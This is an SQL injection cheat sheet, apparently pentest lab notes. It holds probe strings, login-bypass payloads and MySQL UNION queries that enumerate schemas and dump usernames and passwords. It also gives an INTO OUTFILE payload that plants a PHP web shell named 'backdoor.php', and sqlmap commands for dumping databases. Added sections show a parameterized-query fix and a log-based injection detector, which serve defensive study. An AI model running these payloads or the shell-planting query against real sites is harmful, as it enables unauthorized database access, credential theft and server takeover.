SQL injection

Basic technique

Stick ' in a parameter and see if it throws a database error (and note what kind).
Another simple test:

    ' or '1'='1

Other tests:

    -'
    ' '
    '&'
    '^'
    '*'
    ' or ''-'
    ' or '' '
    ' or ''&'
    ' or ''^'
    ' or ''*'
    "-"
    " "
    "&"
    "^"
    "*"
    " or ""-"
    " or "" "
    " or ""&"
    " or ""^"
    " or ""*"
    or true--
    " or true--
    ' or true--
    ") or true--
    ') or true--
    ' or 'x'='x
    ') or ('x')=('x
    ')) or (('x'))=(('x
    " or "x"="x
    ") or ("x")=("x
    ")) or (("x"))=(("x

POST parameters

You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a ' at the end, like lang=en'.

Bypassing authentication

If you find a poorly sanitized login page, you can attempt to log in without credentials by injecting the username parameter:

    username' or 1=1;#
    username'-
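To see why the injected username works and what the fix looks like, here is an added example (not code from the original notes) that runs the login query both ways. It assumes an in-memory SQLite database as a stand-in for the MySQL backend, a hypothetical `users(name, password)` table, and uses `' or 1=1--` because SQLite understands `--` comments but not MySQL's `#`.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """The poorly sanitized login: user input is spliced into the SQL text,
    so a quote in the username ends the string literal and the rest is SQL."""
    sql = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """The fix: placeholders send the values separately from the SQL text,
    so a quote in the input is just data, never a delimiter."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def probe_errors(conn, username):
    """True if the vulnerable query fails outright on this username: the
    'stick a quote in and watch for a database error' test from above."""
    try:
        login_vulnerable(conn, username, "x")
    except sqlite3.OperationalError:
        return True
    return False


# The trailing comment swallows the "AND password = '...'" clause, and
# "or 1=1" makes the WHERE clause true for every row.
PAYLOAD = "' or 1=1--"

if __name__ == "__main__":
    conn = make_db()
    print("bare quote causes DB error :", probe_errors(conn, "'"))
    print("vulnerable login           :", login_vulnerable(conn, PAYLOAD, "wrong"))
    print("parameterized login        :", login_parameterized(conn, PAYLOAD, "wrong"))
```

The vulnerable query becomes `SELECT name FROM users WHERE name = '' or 1=1--' AND password = 'wrong'`, which returns the first user regardless of password; the parameterized version looks for a user literally named `' or 1=1--` and finds nothing.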

Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.
Get the version:

    http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5

You can get the number of columns through trial and error using order by. For each query, increase the column number until the database throws an unknown column error; the last number that worked is the column count:

    http://[host]/inject.php?id=54 order by 1
    http://[host]/inject.php?id=54 order by 2
    http://[host]/inject.php?id=54 order by 3

Get the current user:

    http://[host]/inject.php?id=1 union all select 1,2,3,user(),5

See all tables:

    http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables

Get column names for a specified table:

    http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'

Get usernames and passwords (0x3A is the hex code for :, used as a separator):

    http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users

Depending on the database user's privileges and the file system permissions, you might be able to write to system files using MySQL's INTO OUTFILE clause to create a PHP shell in the web root:

    http://[host]/inject.php?id=54 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
I suspect you could inject a full reverse shell in there too...
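Every probe in the Basic technique list and the enumeration queries above leave a recognisable trace in the web server's access log. As an added example (not part of the original notes), here is a small detector that URL-decodes the query string of each request and flags the patterns those probes produce. The log lines are constructed samples in Apache combined format, the rule names are our own, and the sqlmap user-agent string is assumed rather than copied from the tool.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). The requests mirror
# the probes listed above; the final line is a legitimate apostrophe in a search.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /inject.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /inject.php?id=1' HTTP/1.1" 500 73 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /inject.php?id=1%27%20or%20%271%27%3D%271 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /inject.php?id=54%20order%20by%203 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /inject.php?id=1%20union%20all%20select%201,2,3,table_name,5%20FROM%20information_schema.tables HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /inject.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=o%27reilly HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures applied to the URL-decoded query string (rule names are ours).
HIGH_CONFIDENCE_RULES = [
    # quote, "or", then true / '1'='1 / 1=1 style tautology
    ("tautology", re.compile(r"['\"]\s*or\s+(?:true\b|(['\"]?)\w+\1\s*=\s*\1\w+)", re.I)),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("server_info", re.compile(r"@@version|\buser\(\)", re.I)),
    ("file_write", re.compile(r"\binto\s+outfile\b", re.I)),
]
# A lone quote is far too common in real data (names, searches) to alert on alone.
STRAY_QUOTE = re.compile(r"['\"]")


def query_string(target):
    """Return the URL-decoded query portion of a request target ('' if none)."""
    _, sep, qs = target.partition("?")
    return unquote_plus(qs) if sep else ""


def classify_request(target, status, user_agent):
    """Return the list of signal names this request triggers (empty if none)."""
    qs = query_string(target)
    signals = [name for name, rx in HIGH_CONFIDENCE_RULES if rx.search(qs)]
    if STRAY_QUOTE.search(qs):
        signals.append("stray_quote")
        # A quote that makes the backend fail is the error-based probe the
        # notes open with: much stronger evidence than the quote by itself.
        if status >= 500:
            signals.append("db_error_after_quote")
    if "sqlmap" in user_agent.lower():   # assumed default UA; tools can change it
        signals.append("tool_user_agent")
    return signals


def analyze_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        status = int(m["status"])
        signals = classify_request(m["target"], status, m["ua"])
        if not signals:
            continue
        findings.append({
            "ip": m["ip"],
            "target": m["target"],
            "status": status,
            "signals": signals,
            # only a bare quote with a normal response stays low confidence
            "high_confidence": signals != ["stray_quote"],
        })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        label = "ALERT" if f["high_confidence"] else "note "
        print(f"{label} {f['ip']} {f['status']} {', '.join(f['signals'])}  {f['target']}")
```

The split between high-confidence rules and the stray-quote rule is the important design choice: `o'reilly` in a search box looks exactly like the first probe on this page, so the quote alone only becomes an alert when it is paired with a 5xx response or with one of the structural patterns (union, order by, information_schema).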

SQLmap

Assuming you've tested a parameter with ' and it is injectable, run sqlmap against the URL:

    sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbms=mysql

It may not work unless you specify the database type with --dbms.
Get the databases:

    sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbs --dbms=mysql

Get the tables in a database:

    sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --tables -D [database name]

Get the columns in a table:

    sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --columns -D [database name] -T [table name]

Dump a table:

    sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dump -D [database name] -T [table name]

Passing tokens

If the URL isn't accessible without a session, you can pass cookie data or authentication credentials to sqlmap by saving the raw POST request to a file and using the -r option:

    sqlmap -r request.txt

If you just need to pass a cookie:

    sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar"

REST-style URLs

If your URLs have no query-string parameters, you can still test them by marking the injection points with *:

    sqlmap -u "http://[host]/param1*/param2*"

Further reading